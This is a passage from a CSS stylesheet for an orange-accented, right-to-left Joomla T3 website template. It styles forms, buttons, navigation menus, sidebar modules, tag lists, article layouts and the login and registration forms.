  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-right: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-right: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-right-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #ff8800;
  border-bottom-color: #ff8800;
}
.nav a:hover .caret {
  border-top-color: #b35f00;
  border-bottom-color: #b35f00;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-right: 0;
  padding-left: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: right;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: left;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  left: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #ff8800;
  border-color: #e67a00;
}
.navbar-default .navbar-text {
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-right: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #ffffff;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #e67a00;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #e67a00;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #e67a00;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #cc6d00;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffffff;
    padding: 20px 30px 20px 20px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #cc6d00;
    border-top: 1px solid #b35f00;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #b35f00;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-right: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffffff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #e67a00;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-right: 0;
  padding-left: 0;
  float: right;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-left: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #e67a00;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  right: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  left: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-right: 20px;
  padding-right: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-right: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-right: 0;
  margin-right: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #e67a00;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    right: auto;
    left: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: left;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-left: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-right: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-right: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 0 5px 5px;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: right;
  margin: 0 0 5px 5px;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #ff8800;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #b35f00;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #b35f00;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-left: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #ff8800;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-right: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-right: 0;
  margin-left: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-left: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #ff8800;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #b35f00;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: right;
}
.img-fulltext-right {
  float: left;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: right !important;
  margin-right: 0 !important;
}
.pull-right.article-image-intro img {
  margin-right: 0 !important;
  margin-left: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-right: 0;
    margin-left: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #b35f00;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-right: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: right;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-right: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-left: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-right: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: right;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-right: 0;
  padding-right: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-right: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-right: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: right;
  vertical-align: middle;
  margin-right: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-right: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-left: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-left: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-right: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-right: 140px;
}
.registration fieldset dt {
  margin-left: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: right;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-left: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: right;
